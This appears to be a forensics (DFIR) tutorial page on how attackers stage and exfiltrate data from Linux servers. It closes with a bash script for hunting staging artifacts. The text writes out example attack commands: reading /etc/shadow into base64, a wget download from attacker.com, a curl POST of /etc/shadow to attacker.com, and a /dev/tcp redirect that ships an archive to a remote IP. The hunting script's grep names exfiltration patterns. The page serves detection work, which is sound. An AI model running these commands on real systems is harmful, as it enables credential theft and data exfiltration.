Skip to content

Artifact Analysis: Linux Data Staging & Exfiltration

Before exfiltrating hundreds of gigabytes of databases or source code, adversaries must aggregate and compress the data to reduce transfer time and evade basic Network Data Loss Prevention (DLP) signatures. This phase is known as “Staging”.

Attackers create massive archive files containing the target directories (/var/www/html, /home, database dumps).

  • Behavioral Artifact: tar -czvf /tmp/backup.tar.gz /var/www/html
  • Encryption: Advanced actors will encrypt the archive to blind network inspection: zip -r -e password /dev/shm/secret.zip /home/user
  • Forensic Hunting: Analysts must scan staging directories (/tmp, /var/tmp, /dev/shm) for unusually large files (.tar, .gz, .zip, .7z) or files with suspicious, random extensions.

To bypass basic string-matching filters or to exfiltrate binary data over text-only channels (like DNS), attackers often encode sensitive files.

  • Behavioral Artifact: cat /etc/shadow | base64 > /tmp/shadow.b64

2. Ingress & Egress Vectors (LOLBAS Abuse)

Section titled “2. Ingress & Egress Vectors (LOLBAS Abuse)”

Once the data is staged, or when the attacker needs to download secondary tools (Ingress), they rely on native networking binaries.

Web Clients (curl, wget)

The most common vectors. Ingress: wget http://attacker.com/linpeas.sh -O /tmp/check.sh Egress: Attackers can exfiltrate files directly via HTTP POST requests: curl -F "data=@/etc/shadow" http://attacker.com/upload.php

SSH Tooling (scp, rsync, sftp)

If the attacker controls a remote machine via SSH, they will use encrypted channels. This traffic is invisible to network proxies. Analysts must rely entirely on the Bash History or auth.log outbound connections to detect this.

If a server has been stripped of nc (netcat), curl, or wget for security reasons, attackers can use a built-in feature of the Bash shell to open network sockets directly.

  • The Attack: cat /tmp/secrets.tar.gz > /dev/tcp/198.51.100.45/4444
  • Forensic Challenge: This is a highly stealthy technique. It does not spawn a new child process (like running nc would), meaning it might bypass standard process monitoring. It is handled entirely internally by the existing bash process.

If standard outbound ports are heavily filtered by the corporate firewall, adversaries adapt using alternative channels.

In modern ransomware and extortion campaigns targeting Linux file servers, rclone has become the industry standard for attackers. They download the standalone binary into /tmp and configure it to sync the victim’s data directly to attacker-controlled cloud storage (Mega, Google Drive, AWS S3).

  • DFIR Action: Search for rclone configuration files (rclone.conf) or the orphaned binary in temporary directories.

If the compromised machine is a web server, attackers often skip outbound connections entirely. They simply stage the data inside the web server’s public directory (e.g., mv /tmp/dump.sql /var/www/html/assets/logo.zip) and download it directly through their web browser via standard HTTP GET requests.

  • DFIR Action: Analyze the web server’s access.log for successful downloads (HTTP 200) of unusually large files or strange extensions from the webroot.

When analyzing a mounted forensic image (e.g., at /mnt/analysis/), apply the following triage methodology.

hunt_staging_artifacts.sh
#!/bin/bash
TARGET_DIR="/mnt/analysis"
echo "[+] Hunting for large files (Potential Staging > 50MB) in temp dirs..."
find $TARGET_DIR/tmp $TARGET_DIR/var/tmp $TARGET_DIR/dev/shm -type f -size +50M -ls
echo "[+] Hunting for orphaned rclone or tunneling binaries..."
find $TARGET_DIR/tmp $TARGET_DIR/var/tmp -type f -name "rclone*" -o -name "ngrok*" -o -name "chisel*" -ls
echo "[+] Scanning bash history for exfiltration LOLBAS..."
grep -E "curl.*-F|wget.*--post-file|/dev/tcp/|tar.*-czvf|base64" $TARGET_DIR/home/*/.bash_history $TARGET_DIR/root/.bash_history